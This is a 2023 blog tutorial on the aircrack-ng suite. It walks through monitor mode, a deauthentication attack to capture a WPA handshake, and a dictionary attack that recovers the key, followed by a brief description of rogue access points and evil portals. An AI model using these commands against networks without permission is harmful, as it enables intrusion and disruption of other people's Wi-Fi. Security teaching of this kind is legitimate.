Aircrack-ng

August 15, 2023 · 12 minute read

Overview

Wi-Fi is technology that enables wireless networking and internect connectivity. It allows devices like computers, smartphones, tablets, and other devices to connect to the internet without the need for cables. Wi-Fi technology works by using radio waves to transmit data wirelessly between devices and access points. This technology is built on IEEE 802.11 standards which defines rules and protocols for wireless communication. This includes aspects such as frequency bands, modulation techniques, security mechanisms and more.

Before beginning it is important to understand some key terms:

1. SSID (Service Set Identifier): The name of the Wi-Fi network that devices use to identify and connect to a network.
2. ESSID: An extended network configuration involving multiple access points that share the same SSID to cover a larger network area.
3. WEP: An older out of date encryption protocol for Wi-Fi that is now considered insecure.
4. WPA/WPA2/WPA3: Secure encryption protocols that provide stronger protection for Wi-Fi networks. The number differentiates on different generations of security protocols. Each generation builds upon the previous one addressing vulnerabilities and weaknesses.

While Wi-Fi serves as an immensely valuable tool, it is susceptible to a wide range of attacks. One of the tools commonly used for testing the security of Wi-Fi networks is a framework recognized as aircrack-ng.

Aircrack-ng is a suite of wireless network security tools designed for monitoring, analyzing, and attacking Wi-Fi networks. Aircrack-ng contains modules capable of packet capture, packet analysis, packet injection, rogue access point attacks, and more.

A comprehensive list of Aircrack-ng tools can be found below:

Aircrack-ng: This is the main tool of the suite and is used to capture packets from a wireless network, and then performing crytopgrahic attacks to recover WEP/WWPA/WPA2 keys.
Airmon-ng: Manages wireless network interfaces, includes putting them into monitoring mode.
Airodump-ng: Used for capturing packets from wireless networks.
Aireplay-ng: Used for injecting traffic into wireless networks. This can be used for deauthentication attacks.
Airbase-ng: Can be used to set up fake access points.
Airtun-ng: Used to set up encrypted tunnels over a wireless network. Especially useful for securing communication or bypassing network restrictions.
Airdecap-ng: Used for decrypting captured encrypted traffic.

DISCLAIMER: The information provided in this article is intended for EDUCATIONAL purposes only. It is NOT intended to promote, encourage, or condone any illegal or unethical activities. Any actions taken based on information provided in this article are at the sole discretion and risk of the user. By reading this article, you acknowledge and agree to these terms.

Cracking Wi-Fi Passwords

A simplified overview of cracking Wi-Fi passwords can be seen below:

1. Capturing Packets: The first step is to capture data packets from the target network. These packets contain information about network activity.
2. Collecting the Handshake: WPA and WPA2-PSK encrypted networks use a four-way handshake between a client device and a access point when a client wants to connect to the network. In order to collect these packets we can conduct a deauthorization attack to force devices to reconnect to the network; where we can then sniff the handshake.
3. Dictionary Attack: Once the handshake is captured, we can use a dictionary attack to attempt to crack the password. We compare the encrypted handshake data with the computed hashes of the dictionary entries.
4. Brute-Force Attack: If the dictionary attack fails, attackers can resort to a brute-force attack that tries every possible combination of characters until the correct password is found.

It's important to note that the strength of the password greatly affects the feasability of cracking. Longer, uncommon, more complex passwords are EXTREMELY difficult to crack using these methods.

Practical Demonstration

In order to capture packets containin the handshake, we must first configure our wireless interfaces to passively listen to all wireless communications within its range. This can be done with Airmon-ng a demonstration of this can be seen below.


#Check for processes that might interfere with the aircrack-ng suite and KILL them.
──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng check kill

Killing these processes:

    PID Name
    763 wpa_supplicant

#Start monitor mode on target wireless interface
──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng start [WIRELESS INTERFACE NAME]

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n

#Ensure that target wireless interface is in moniter mode
──(root㉿kali)-[/home/kali]
└─# iwconfig

lo        no wireless extensions.
eth0      no wireless extensions.
wlan0mon  IEEE 802.11 Mode:Monitor Frequency:2.5 GHz Tx-Power=20 dBm
          Retry short limit: 7  RTS thr:off Fragment thr:off
          Power Management:off

After configuring our wireless interface to function in monitor mode, passively intercepting all traffic, the next step is to use Airodump-ng to obtain information from our targeted network. An example of this can be seen below.

If we want to use airodump-ng to listen to a specific network, we can use the following syntax: sudo airodump-ng wlan0mon -d [BSSID OF TARGET NETWORK]. Otherwise, if this is not specified, airodump-ng will grab data from all networks.


──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng wlan0mon

CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                            
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                         
7F:9E:2C:1D:A5:8B   25  16       10        0    0  11  51.  WPA              NETGEAR                                                    
                                                                                                           
BSSID              STATION            PWR   Rate   Lost  Packets  Notes  Probes                       
9D:1E:F0:3B:7A:5C  00:0F:B5:32:31:31   61   16-54    2       18

The next step is to attempt to capture the WPA Handshake from a user that is connected to the network. A WPA handshake, also known as a 4-way handshake, is a process that occurs when a device attempts to connect to a Wi-Fi network secured with WPA or WPA2. The handshake is designed to establish a secure and encrypted connection between the client and the access point.

We can easily do this by utilizing two Aircrack-ng modules. Airodump-ng to listen to and sniff the WPA handshake, and Aireplay-ng to initiate a deauthentication attack so clients must reconnect to the access point.


#Use Airodump-ng to sniff handshake
──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng -w results -c 11 -b 7F:9E:2C:1D:A5:8B wlan0mon

CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                            
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                         
7F:9E:2C:1D:A5:8B   25  16       10        0    0  11  51.  WPA              NETGEAR                                                    
                                                                                                           
BSSID              STATION            PWR   Rate   Lost  Packets  Notes  Probes                       
9D:1E:F0:3B:7A:5C  00:0F:B5:32:31:31   61   16-54    2       18

#Deauthorization attack
# -0 Means deauthentication
# 10 Means the number of deauthentication packets you want to send, 0 means continuously
# -a MAC Address of access point
# -c MAC Address of client to deauth, if this is blank, all clients are deauthenticationed
# wlan0mon interface name
──(root㉿kali)-[/home/kali]
└─# sudo aireplay-ng -0 10 -a 7F:9E:2C:1D:A5:8B -c 9D:1E:F0:3B:7A:5C wlan0mon

11:32:32  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:32  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:33  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]

#Hand shake is captured one you see WPA: Handshake field pop up
CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 7F:9E:2C:1D:A5:8B

Afterwards, you should have the results of the packet capture in your directory with whatever file name you designated. You can then analyze and crack the password using Aircrack-ng.

Once this is complete, remember to turn monitor mode off so your connection to internet can be restored.


──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng stop wlan0mon

#Begin dictionary attack with wordlist
──(root㉿kali)-[/home/kali]
└─# sudo aircrack-ng results.cap -w rockyou.txt

                        Aircrack-ng 1.4

            [00:00:03] 561 keys tested (3126.25 k/s)

                    KEY FOUND! [ iloveyou ]


Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 
    39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 35 55 24 EE 

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 
    63 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 
    AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 
    D9 6F 76 5B 8C D3 DF 13 2F BC AA 6A 6E D9 62 CD 

EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Creating Malicious Rogue Access Points

Rogue access points refer to unauthorized wireless access points that are set up on a network without the knowledge or permission of network administrators. Rogue access points are capable of various malicious activities such as eavesdropping, Man-in-the-Middle attacks, Malware Distribution, Data Injection, as well as Phishing attacks.

Rogue access points can be used in tandem with Evil Portals in a combination of wireless network and phishing attacks. Evil portals appear when a user tries to access a public Wi-Fi network, and typically prompts the user to enter login credentials. Attackers can set up evil portals to mimic legitimate captive portals, tricking users into entering credentials and giving the attacker access to sensitive information.

I plan to explore creating rogue access points and combining them with evil portals sometime in the future.